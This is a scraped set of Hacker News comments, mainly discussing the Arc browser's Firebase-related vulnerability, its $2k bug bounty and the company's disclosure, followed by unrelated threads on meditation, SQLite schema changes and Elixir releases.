I’m Hursh, cofounder and CTO of The Browser Company (the company that makes Arc). Even though no users were affected and we patched it right away, the hypothetical depth of this vulnerability is unacceptable. We’ve written up some technical details and how we’ll improve in the future (including moving off Firebase and setting up a proper bug bounty program) here: https://arc.net/blog/CVE-2024-45489-incident-response.
I'm really sorry about this, both the vuln itself and the delayed comms around it, and really appreciate all the feedback here – everything from disappointment to outrage to encouragement. It holds us accountable to do better, and makes sure we prioritize this moving forward. Thank you so much.
Was the post written for HN users only? I cannot see it on your blog page (https://arc.net/blog). It’s not posted on your twitter either. Your whole handling seems to be responding only if there is enough noise about it.
Hursh, can you please respond to the above commenter? As an early adopter, I find it fairly troubling to see a company that touts transparency hide the blog post and only publicly "own up to it" within the confines of a single HN thread.
Security bulletin is posted up top on the blog page now, but I have to say it doesn't exactly give me a warm and fuzzy feeling.
It falls a bit flat for me where you address the tracking of domains visited by users, I don't think this accurately addresses or identifies the core issues. When you say "this is against our privacy policy and should have never been in the product to begin with"--okay, so how did get there? This wasn't a data leak due to a bug it was an intentionally designed feature that made its way through any review process which might be in place to production without being challenged. What processes will you put in place to prevent future hidden violations of your stated policies?
Edit just to say, dubious as I am I sincerely hope Arc can overcome these issues and succeed. We desparately need more browsers, badly enough that I'll even settle for a Chromium-based one as long as it isn't made by Microsoft.
Right now You and Arc are advertising it's ideal to position posts such as "Hidden Features in Arc Search" to users but security bulletins and remediations are something that need a hidden stopgap until you've scrambled to build an alternative site to hide them away at instead.
Browser security is more than finding the best PR strategy, it's a mindset that prioritizes the user's well being over the product's image. I've deleted my account and uninstalled Arc. Not because of the issue in itself, but because it's clear what the response has been aiming to protect (not my data).
The sibling comment to this by sieabahlpark is already dead but to respond in case they get a chance to read the thread again anways:
The engineers already closed the hole, the blog post was already published, more work was (/is still?) going to be done to make a new site to hide them in. I wasn't asking for them to move engineers off patching to blog posting, I was asking for the already created blog posting to be made as visible in the blog the same as the posts were (which is now the case, so at least there is that).
In regards to whether or not they did analysis to show it wasn't exploited that was indeed nice to see but you still have to make the post visible anyways because you're not always right, even if you're one of the biggest companies in the world https://www.theregister.com/2024/09/17/microsoft_zero_day_sp... The measure to meet here is transparency, not perfection.
And no, I wasn't really sitting around waiting for a good opportunity to delete my account and uninstall my main browser. That would be... very odd? I'm free to change browser without a reason to blame haha. I didn't say what I was switching to either (it's quite irrelevant to the topic), which can certainly be more than one of 2 options you have quips for. Regardless which option, the measure to meet here is again not perfection but transparency and yes, others do meet that well and above how Arc did in this case.
More than anything, the reason for responding is less to argue about most of those points (I even debate just removing them now as they may detract from the point) and more to point out "real" transparency on security incidents (not just what a PR person would say gives the best image) is as big a factor in trusting a company with your data as their actual response to vulnerabilities. It doesn't matter that a company looks great 100% of the time they tell you about things if you know they are being intentionally stingy on showing you anything about it since you now have no way to trust they'd show you the bad anyways.
(repeat of the above response type. Sorry if this breaks a rule or something Dang, but it's a pretty tame/decent conversation)
This is still responding to a different complaint. The operational performance of "optimally distributing" the message, or however you want to word it, on was/is both imperfect and perfectly fine at the same time. Where the ball was dropped was in responding to a complaint about how the posting was specially hidden where the communicated action was how it will be shown on a different site in the future in place of acknowledging it should be visible as a normal post currently.
When the alarms are going off you're going to be slow, you're going to make the wrong decision on something minor, you're going to wish you had done x by y point in time looking back, you're going to have been imperfect. All that kind of stuff was handled fine (from what I can tell) here. The disappointment in transparency was in deflecting a presented highlight in how to fix a visibility issue instead of outright acknowledging it was a miss.
My message was/is about how that's not cool. Not that their handling of the issue itself was bad or an expectation of apology or expectation more resources should have been put on doing x, y, or z. Just that deflecting callouts on security communication issues with deferrals and redirection is not a cool way to handle security communication. They've since changed it, which is cool of them, but the damage was done with me (and maybe some others) in the meantime. Maybe in the future they handle that differently, maybe they don't, but for now I lost the trust I had that they always will, even when nobody is looking, since they didn't even when they knew people were.
Every comment I make is immediately dead upon me posting, it's been that way for about a year.
I believe transparency is necessary, but also have been in the situation where the alarms are going off and you slip on making sure disclosures are optimally distributed. Generally I'm just concerned that it's documented at all.
Now if they maintained not revealing the security issue over the following week I'd agree.
Should they have had a bulletin stating when it occurred in August? Absolutely. I'm not disagreeing, and the distance from that event I would agree with you. However, considering just how fundamental the security vulnerability was there isn't exactly an immediate benefit to blast that to the world. It opens up the spotlight for more advanced attacks to take advantage of other unpatched holes.
Taking the time to go through and _really_ make sure it's patched (as well as a general check around the codebase for other EZ vulns) is, in my opinion, the better option.
Now if this had been a larger timeframe and repeated offense I'd agree the security hygiene for Arc should be bumped up in priority ASAP and until that probably happens Arc as a platform could not be trusted.
Not a good look it not being on the main page! I personally use [zen browser](https://github.com/zen-browser/desktop); I like the ideas of Arc, but it always seemed sketchy to me, especially it being Chromium-based and closed-source.
I used Arc for a while because despite my misgivings about using a browser that requires an account etc the workflow was very good for me
I started moving to Zen about a week ago, hearing about this vulnerability yesterday and especially seeing their reaction to it I know I made the right choice in leaving Arc.
Hell despite missing tab groups, Zen browser is the only browser that finally had a "good enough" vertical tabs implementation, which allowed me to finally drop Edge as my main browser.
Hi Hursh, I'm Tom. A couple friends use Arc and they like it, so I had considered switching to it myself. Now, I won't, not really because of this vulnerability itself (startups make mistakes), but because you paid a measly $2k bounty for a bug that owns, in a dangerous way, all of your users. I won't use a browser made by a vendor who takes the security of their users this unseriously.
By the way, I don't know for sure, but given the severity I suspect on the black market this bug would have gone for a _lot_ more than $2k.
Selling vulnerability on the black market is immoral and may be illegal. The goal of bug bounty programs was initially to signal "we won't sue white hat researchers who disclose their findings to us", when did it evolve into "pay me more than criminals would, or else"?
Let's set aside morality for a second. There is a reason low payouts are bad without even having to consider the black market: it pushes people to search for bugs in a competitor's app that pays more instead of in your app!
If your app is paying out $2K and a competing app pays out $100K, why would anyone bother searching for bugs in your app? Every minute spent researching your app pay 1/50th of what you'd get searching in the competing app (unless your app has 50x more bugs I suppose, but perhaps then you have bigger problems...).
I'm always so confused by the negative responses to people asking for higher bug bounties. It feels like it still comes from this weird entitlement that researchers owe you the bug report. Perhaps they do. But you know what they definitely don't owe you? Looking for new bugs! Ultimately this attitude always leads to the same place: the places that pay more protect their users better. It is thus completely reasonable to decide not to use a product as a user if the company that makes the product isn't paying high bug bounties. It's the same as discovering that a restaurant is cheeping out on health inspections and deciding to no longer eat there.
Bug bounties are always in relation to severity, number of users potentially at risk, and market cap. A browser operating at a deficit from a small company with a small market share cannot pay 100k even if they wanted to.
If you and a couple friends released an app that had 50k users and you’d not even broken even, can I claim my 100k by finding a critical RCE?
No, because you probably haven’t bothered to find said CVE. There’s a strange refusal to understand the simplest market considerations here. I understand it sucks and you may not be able to afford it, but the consequence, regardless of all the reasons you can give, is that you will get less of the right kind of attention (security researchers). Now, you can hope that you will also get less of the wrong kind of attention too, and if you’re lucky all of these will scale together. Or, alternatively, you can for example not start by introducing features like Boosts that have a higher probability of adding security vulnerabilities, counter-acting the initial benefit of riding in Chrome’s security by using the same engine. Browsers are particularly sensitive products. It’s a tough space because you’re asking users to live their life in there. In theory using Chromium as a base should be a good hack to be able to do this while plausibly offering comparable security to the well established players.
Long story short, there are ways to creatively solve this problem, or avoid it, but simply exclaiming “well it would be too hard to do the necessary thing” is probably not a good solution.
lol, that’s not how this works, that’s not how any of this works…
you cannot demand more than someone is willing to or able to pay, either a researcher out there will spend some time on it because it’s a relatively new contender to the market and they’re hoping for low hanging fruit, or they won’t.
obviously the bounty was enough for someone to look at it and get paid out for a find, otherwise we wouldn’t be having this conversation. trying to argue that they should set a bounty high enough to make it worth your time is pointless and a funny stance to take. feel free to ignore it or be upset that they aren’t offering enough to make you feel secure, it’s not going to make 100k appear out of thin air.
I’m not a security researcher, so it’s really not about me. You seem to be confused about what we’re even arguing about, this discussion started because someone said they wouldn’t use this browser because the low bug bounty amount represents that the company isn’t taking security seriously. My posts simply defend why this is a perfectly reasonable stance to take. They are not me demanding an increase in bug bounties so that I will work on them. A good trick if you’re ever confused about a discussion is to simply scroll up and read the posts, I’ll make it even easier for you, this is where it starts: https://news.ycombinator.com/item?id=41606272
Secondly, in a true demonstration of confusion, if you read my posts they demand nothing. They simply state what are likely outcomes of certain choices. I’m not sure how to possibly make the stance of “if you pay smaller bug bounties in a market that has other offerings, you will get less research focused on your product” any simpler. It seems fairly straightforward… and the existence of one bug report does not somehow “disprove” this. Why not make the bug bounty $1 otherwise? Oh, is that a ridiculous suggestion? Because that might not be a worthwhile enough incentive perhaps? But who are you to dictate what is and isn’t a worthwhile incentive. “That’s not how this works. That’s not how any of this works…”
> “either a researcher out there will spend some time on it […] or they won’t.”
Yes, I agree with this truism that they either will spend time on it or they won’t. Interestingly, this is true in all scenarios. My point is how to optimize researchers spending time on your product (which in theory you are inclined to do if your are offering a bounty), and I then separately even make suggestions for how to possibly require less attention by making safer choices and being able to “ride” on another project’s bug bounties.
But again, the simplest point here is that the position of “we offer low bug bounties because that is what we can afford” is fine, it’s just also absolutely defensible to be completely turned off by it as a potential user of that product, for the likely security implications of that position.
Put it this way. If someone got hold of the vuln and exploited all the users and they all sued you, how much would it cost to defend yourself in court (not even considering winning or losing)
Right, part of the idea is to close the gap in incentives for white hats looking for vulnerabilities to report and black hats looking for the same to exploit. You don't have to beat the black market price of a vuln because that route is much riskier, but somewhere at least in the same order of magnitude sounds decent.
It's not about viewing security researchers as sociopaths who will always sell to the highest bidder, the fact is there will always be criminals going for exploits and bug bounties can help not just by paying off someone that would have otherwise abused a bug but also by attracting an equally motivated team who would otherwise be entirely uninvolved to play defense.
> because you paid a measly $2k bounty for a bug that owns, in a dangerous way, all of your users
The case is redeemable. It may still be an opportunity if handled deftly. But it would require an almost theatrical display of generosity to the white hat (together, likely, with a re-constituting of the engineering team).
After thinking about it for a good long ten seconds, yeah. It would be very easy to steal users' banking information with this. If you crack into one single bank account you have a decent shot at making over $2k right there, a skilled hacker could do a lot more.
Comments further down are concerned that on each page load, you're sending both the URL and a(n identifiable?) user ID to TBC. You may want to comment on that, since I think it's reasonable to say that those of us using not-Chrome (I don't use Arc personally, but I'm definitely in the 1% of browser users) are likely to also be the sort of person concerned with privacy. Vulnerabilities happen, but sending browsing data seems like a deliberate design choice.
I think that is addressed in the post. Apparently the URL was only sent under certain conditions and has since been addressed:
>We’ve fixed the issues with leaking your current website on navigation while you had the Boost editor open. We don’t log these requests anywhere, and if you didn’t have the Boosts editor open these requests were not made. Regardless this is against our privacy policy and should have never been in the product to begin with.
Given the context (boosts need to know the URL they apply to after all) this indeed was a "deliberate design choice" but not in the manner you appear to be suggesting. It's still very worrisome, I agree.
There isn't really anything you can do to convince me that your team has the expertise to maintain a browser after this. It doesn't matter that you have fixed it, your team is clearly not capable of writing a secure browser, now or ever.
I think this should be a resigning matter for the CTO.
And what, you’re going to find them a new CTO? What kind of magical world do you live in where problems are solved by leaders resigning, instead of stepping up and taking accountability?
CTO is simply a title, the proper response here would be to hire a head of security and build it into the culture from the ground up.
I'm looking at all of the Arc Max features which probably need to be architected correctly to be secure/privacy-preserving.
They could take a lot of inspiration from iCloud Private Relay and iOS security architectures in addition to really understanding the Chrome security model.
because sometimes it's a deadline pushed by management so a change could result in allow more time for design, programming, review, or even full time security personnel. Nobody writes the best most secure software under deadline
Yeah, I also think that asking someone to resign for this does not look like a proportionate response
They are owning up to their mistakes and making sure such things don't happen again (and increasing the amount from 2K :-)) seems like the right approach to me
Surprise surprise, turns out it takes a looong time for every software startup to finally strip out all the hacky stuff from their MVP days. Apparently nobody on this startup community forum has ever built a startup before.
Pro tip: if stuff like this violently upsets you, never be an early adopter of anything. Wait 5-10 years and then make your move.
Personally, I expect stuff like this from challenger alternatives, this is the way it should be. There is no such thing as a new, bug-free software product. Software gets good by gaining adoption and going through battle testing, it’s never the other way around like some big company worker would imagine.
I don't think you understood the severity or the noobiness of the error. This is a browser not a crud app or electron app. A browser is a complex system level piece of software not a hacky mvp and this kind of error shows that maybe they don't have the competence to be building something like this. It makes you wonder what other basic flaws are there just waiting to be exploited, even if its built on top of chromium. Would you fly in an mvp airplane built by bicycle engineers? (maybe not the best analogy since the first airplane was built by bicycle engineers)
Agreed, I wouldn’t have hopped on the first airplane with some bicyclist named Wilbur. That would involve risk of immediate physical harm.
On the other hand, we’re talking about a 2 year old browser leaking what websites you visit. Do you also think Firefox in 2006 was bulletproof? The entire internet and every single OS & browser was a leaky bucket back then.
The current safety-ism, paranoia and risk-aversion around consumer software on this forum is hilarious to me. Maybe they shouldn’t have called this place “Hacker” news, because it’s now full of people LARPing as international intelligence agency targets from a 90s movie. If the prying Five Eyes are such a concern for you, maybe use a fake email when signing up for stuff and your browser history is instantly anonymized.
Yes, startups involve lots of risk (to everyone involved, users/employees/founders/investors). But risk is the only way we get new things. If you those risks are too scary for you, stay far away startups.
You're speaking in bland hand-wavy generalities and like I said before I'm not sure you understood the issue or even read the write-up since you're not really addressing it specifically (it's a whole lot more than 'leaking'). To extend the analogy, this is like having bike engineers build an mvp supersonic jet and you find out they are using bike brakes to stop the thing. Its not even just merely an error its about some very questionable architecture. This is not a mozilla innovating the browser and making the mistakes you get when you're experimenting-and-innovating-something-new type situation at all and it has nothing to do with paranoia or five-eyes lol.
> $2,000 is a tiny fraction of what this bug is worth
The Browser Company raises $50mm at a $550mm post-money valuation in March [1]. They’ve raised $125mm altogether.
Unless they’re absolute asshats, they’ll increase the bug payout. But people act truly when they don’t think they’re being watched—a vulnerability of this magnitude was worth $2k to this company. That’s…eyebrow raising.
"We will let anyone run arbitrary JavaScript on all your web pages if you send them a referral link" is surely a 6-7 figure vulnerability for a web browser. That this vulnerability was discoverable using about two steps of analysis tools suggests many more issues are in the product.
It is very strange to me that their attitude is "no one was impacted" and this is "hypothetical". Any serious company would immediately consider this to be a case where everyone was impacted! This is like coming home to the worst neighborhood on the planet to find your door wide open, and immediately putting on a blindfold so you can continue to pretend nothing's changed.
Can you explain? How are they able to check whether someone did a quick “in and out” keylogger or cookie extraction? I doubt they can, because I doubt they store every request (that would go against what they claim for privacy) and I also doubt their DB backup happens on such a high frequency that they could catch this (e.g. minute-to-minute).
So…how? Are you claiming they have oodles of logs and a perfect dork* to find suspicious JavaScript? If they had the latter wouldn’t they already be using it for security?
I don't think you're using "dorking" correctly here, since web crawlers aren't anywhere in the picture. Server log queries aren't "dorks." Besides, if you can reproduce the issue and _if_ it's somehow logged in the database, it's usually not too hard to figure out how to query for other occurrences.
With that said, I think you're probably right. I doubt Firebase audit logs contain update contents, and based on the bug report, your "in and out" proposal is as simple as:
Most of the vulnerabilities I've disclosed, and I've seen disclosed, were disclosed for free, with no expectation of getting anything. Why do you think every researcher is an amoral penny pincher who will just sell exploits without caring for the consequences?
I know a lot of different people who do independent security research and have submitted vulns to bounty programs. Not a single one would even come close to saying "well, the bounty is low so I'll sell this on the black market."
Low bounties might mean that somebody doesn't bother to look at a product or doesn't bother to disclose beyond firing off an email or maybe even just publishes details on their blog on their own.
Bounties aren't really meant to compete with black markets. This is true even for the major tech companies that have large bounties.
Firebase is not to blame here. It's a solid technology which just has to be used properly. Google highlights the fact that setting up ACLs is critical and provides examples on how to set them up correctly.
If none of the developers who were integrating the product into Arc bothered about dealing with the ACLs, then they are either noobs or simply didn't care about security.
Until this individual comes back and responds to at least a few of the questions/comments, I don't think we should even pay attention to this marketing-dept-written post. They basically want this to go away, and answering any questions would raise more issues most likely, so they just seemed to have done the bare minimum and left it at that. It's 3 hours later now, they might as well have not even posted anything here.
50k or 100k would be far more appropriate given the severity of this issue. But overall, this makes me think there's probably a lot more vulnerabilities in Arc that are undiscovered/unpatched.
Also, there's the whole notion of every URL you visit being sent to Firebase -- were these logged? Awful for a browser.
Ya this is fair! Honestly this was our first bounty ever awarded and we could have been more thoughtful. We’re currently setting up a proper program and based on that rubric will adjust accordingly.
I think the bigger question is: Why are you violating your own security policy by keeping track on what we browse. I though my browsing is private and hidden away from you but if you store my browsing data in your firebase this is not acceptable at all.
> "...the hypothetical depth of this vulnerability is unacceptable."
What is also unacceptable is to pay 2000 dollars for something like this AND have to create user accounts to use your browser. Will definitely stay away from it.
I would like to respectfully provide the suggestion of allowing for the use of Arc without being signed into an account. Although I understand browser/device sync is part of most modern browsers, and the value it provides, normally it is a choice to use this feature. Arc still provides a lot of attractive features, even without browser sync on.
I like Arc, and I don’t want to pile on: God knows I’ve written vulnerable code.
To explore a constructive angle both for the industry generally and the Browser Company specifically: hire this clever hacker who pwned your shit in a well-remunerated and high-profile way.
The Browser Company is trying to break tradition with a lot of obsolete Web norms, how about paying bullshit bounties under pressure rather than posting the underground experts to guard the henhouse.
If the Browser Company started a small but aggressive internal red team on the biohazard that is the modern web?
I’ll learn some new keyboard shortcuts and I bet a lot of people will.
So when there are near weekly reports of websites being compromised due to horrid Firebase configuration, did absolutely no one on your teams raise a red flag? Is there some super low-pri ticket that says "actually make sure we use ACLs on Firebase"?
Hursh / ha470, where did you go? There are lots of good questions in the replies to your thread, yet you went dark immediately after posting more than 8 hours ago. It's hard to imagine what could be more pressing than addressing people's concerns after a major security incident such as this.
To be honest, I'm a bit disappointed. For future reference, this doesn't seem like a good strategy to contain reputational damage.
> This kind of bug could be sold for 100-200k easily
Maybe not. If the browser is that buggy, there may be plenty of these lying around. The company itself is pricing the vulnerability at $2k. That should speak volumes to their internal view of their product.
Many engineers at SV startups use Arc on a daily basis. This bug could've resulted in the compromise of multiple companies, probably including crypto exchanges. A browser bug of this severity is extremely valuable, even for a niche browser like Arc.
> Many engineers at SV startups use Arc on a daily basis
Do we have adoption statistics?
It would seem prudent for the browser to be banned in professional environments. (I use Kagi's Orion browser as a personal browser on MacOS. My work is done in Firefox.)
> browser bug of this severity is extremely valuable, even for a niche browser like Arc
Absolutely. (Even if it were in beta.)
What I'm trying to say is the $2k payout sends a message. One, that The Browser Company doesn't take security seriously. And/or two, that they don't think they could pay out a larger number given the state of their codebase.
Side note: my favourite content on crisis management is this 2-minute video by Scott Galloway [1]. (Ignore the political colour.)
There is also 3: putting a big bounty out signals other very smart and ingenious security researchers that Arc is a lucrative opportunity to make money. Till now it's been "safe" in relative obscurity so not a lot of people focused on hacking it or gave it a lot of effort because it wasn't worth their time.
It’s already going to be under the microscope now from black hats, so unless they want a catastrophic issue to result in user harm, they better get their act together.
I think OP mean to say "this bug could let an attacker gain $200k of value easily", though you are right the market clearing price for such a vulnerability is probably low due to huge supply.
The CTO and co-founder didn't check in on any of the concerns, completely disappeared after leaving a heartfelt comment.
This comes off as incredibly disingenuous.
It's disappointing that he seems to confuse the field in which intelligence and perception take place (the subjective experience of being alive) and the sensory perception and thought inside it. It'd be a much more interesting article if he focused on how and why the former shows up out of physical neurons.
You can either get information from other people you trust and you think would give you accurate feedback or by trying to develop a clearer sense of how your own mind works via ego dissolution.
For the former, its probably ideal to pick someone you trust and respect, and try to be clear with them you want critical or constructive feedback.
For the latter, meditation, therapy, and Vedanta-style self-inquiry can all trigger more self-awareness and self-dissolution. As the amygdala shrinks and prefrontal cortex gets more activated, the fear-based, survival-oriented self erodes and you start to be able to see more clearly and objectively.
While I love SQLite as much as the next person (and the performance and reliability is really quite remarkable), I can’t understand all the effusive praise when you can’t do basic things like dropping columns. How do people get around this? Do you just leave columns in forever? Or go through the dance of recreating tables every time you need to drop a column?
SQLite is for storing data in an environment where SQL is meaningful. Anyone wanting to do database admin tasks (like adjusting table schema) would be well advised to go with a Real Database.
SQLite really shines when you have a more-or-less final idea of what tables you want to build and don't have to worry about users inputting crazy data. Anything up to that and it is a model of simplicity. Anything beyond that and it is undercooked.
I just sucked the existing table into RAM and recreated the table. I did it on a transaction so there was no risk of data loss.
In my case the data was always 10s of MBs.
Remember, the point of SQLite is a replacement for generating a file format. Although it's a database, it lets us (developers) re-use our knowledge of databases when doing basic file I/O.
When do you need to drop a column in a production DB? Maybe my anecdotal bubble is about to burst, but I work in the public sector, and have for a while and on our 200 different production DBs behind around 300 systems we’ve never dropped a column.
Depends on the maturity of your schema - if it's all figured out based on your business domain it won't happen much. If you're still finding product-market fit (or equivalent) splitting a table into two happens sometimes.
"Splitting" a table usually means creating two new ones and dropping the old one after migrating its content with a complex migration script followed by thorough testing. Dropping columns is not only abnormal (adding columns is far more common: features tent to be added, not removed, over time) but also a very crude tool.
Well what I meant was: when you break one table out of another. The kind of thing that comes up when you learn that there's a one-to-many in the domain that you didn't know about when you started.
There are also operational concerns here. Dropping columns may require rebuilding indices, which can have a high cost that isn't worth paying for just to keep the schema clean.
Pretty sure they must, row based storage on disk would practically require it just to not completely waste all of the space you've just gained from deleting the column by leaving a gap on every single row.
If adding a nullable column is free, it probably means that the DBMS is able to distinguish multiple layouts for the same table: existing rows in which the new column doesn't actually exist and is treated as NULL, and newly written rows in which there is space for the new column.
But dropping a column is different: even if the DBMS performs a similar smart trick (ignoring the value of the dropped column that is contained in old rows) space is still wasted, and it can only be reclaimed by rewriting old files.
Dropping a column in postgres is also instant, so yes, it uses the same trick.
Deleting a row is similar too - the row is not removed from the heap page and the database does not get smaller (though if that page gets rewritten the row is not kept). Last time I used innodb it didn't actually return free heap pages to the filesystem at all so no matter how much you deleted the database file never got smaller.
I agree with you. SQLite drove me nuts when it came to changing your database. This is one of the reasons I just use DB Browser for SQLite (DB4S). It takes care of all the complexity.
The general strategy is to create a new table, insert data from the old table,
drop the old table, rename the new table, and re-create the indexes:
create table foo2 (
col1 int,
col2 text
);
insert into foo2 sleect col1, col2 from foo;
drop table foo;
alter table foo2 rename to foo;
create index on foo(col1);
As for the reason, see the next section on that link. It's not perfect, but it is what it is. SQLite wasn't designed to solve 100% of the use cases, and that's not a bad thing.
We use sqlite as a smaller cache of a much larger postgres db. The cache is generated by a job and yes is regenerated every time before being pushed to machines that need it.
Think of SQLite as a file format which happens to have a query interface, and not a database.
MySQL did DML for years with full table rewrites behind the scenes. It's not particularly hard to emulate, though not entirely pleasant.
(Although I really raise an eyebrow when people talk about performance. Every time I write anything server-like in sqlite I end up regretting it, and get enormous speed boost, not to mention actual concurrency, switching to PostgreSQL.)
For data analysis workloads i just load in my raw source data and then develop a series of scripts that create new tables or views on top of those raw inputs.
For my use cases I've thusly never had to drop/alter a column... but I understand it could be very annoying.
Yes! The first few were super tough (and not fun) but I got a lot out of them and gradually they've gotten easier, although just as productive.
So many people in the comments mentioned retreats but I'm surprised not a single person mentioned enlightenment. The whole point of retreats is to get you to a point where you willfully and intentionally seek freedom from suffering, but it seems like a ton of people get stuck in the retreat treadmill. Living a happier, more peaceful life is one thing but it's very possible to completely eradicate the subjective experience of suffering (or at least eliminate enough of it that it's largely unnoticeable). Enlightenment is very accessible and super achievable, especially now with the internet.
Sorry if this is a dumb question, but how do releases fit into the deployment story with containers so prevalent these days? (As in why is this a benefit when you can just package code into a single container to ship it?) Is it that it works with hot code updates? Or it’s a more Erlang-sanctioned way of deploying code?
Fred Hebert was on the ElixirTalk podcast and mentioned speed of deploys as one advantage - no need to rebuild a bunch of VMs.
> From experience, we could deploy to a 70-node cluster in something like under 5 seconds by doing it in parallel. If you want to rotate your infrastructure... your deploy could be taking from 5 minutes to an hour depending on how fast the connection draining can be done.
There's a good 'why releases' section of the article.
Even without the compilation and configuration stuff, it's easier to put the release bundle in something basic like an alpine image, rather than keep docker image versions and app in sync.
But the article says you have to run the release on the same OS/version that you built it on. So if you're running it on alpine, won't you need to build it on alpine, which suggests you'll need to configure your Dockerfile to compile it anyway?
You would have two images, one with all compile time dependencies, sources, etc, which you use to assemble the release, and another image with only the artifact (the release) and none of the rest. Hex (Elixir's package manager) is open source and uses this approach, which you can see here: https://github.com/hexpm/hexpm/blob/d015973e472af59644ee537f...
That is correct. But that can be multiple stages, and therefore separated concerns.
Also, releases can be very small, after all the superfluous parts/symbols are stripped. Combine that with a fresh alpine image and you have quick-to-deploy containers.
With Distillery you can specify a directory for the ERTS so the release can be built on one OS and run on another. You just have to make sure ERTS was built on the OS that it will eventually run on.
Building a container and building a release are quite similar in many respects, so if all you want to do to compile your Elixir app during a container build, a release might not give you very much. An Erlang/Elixir release has some goodies that you might be interested in, so I'd read up on those goodies to see if they are attractive to you.
Ideally you (and everyone else) should be rewarded for business impact- which can come from communication, code quality, velocity, and any number of other things.
I'm really sorry about this, both the vuln itself and the delayed comms around it, and really appreciate all the feedback here – everything from disappointment to outrage to encouragement. It holds us accountable to do better, and makes sure we prioritize this moving forward. Thank you so much.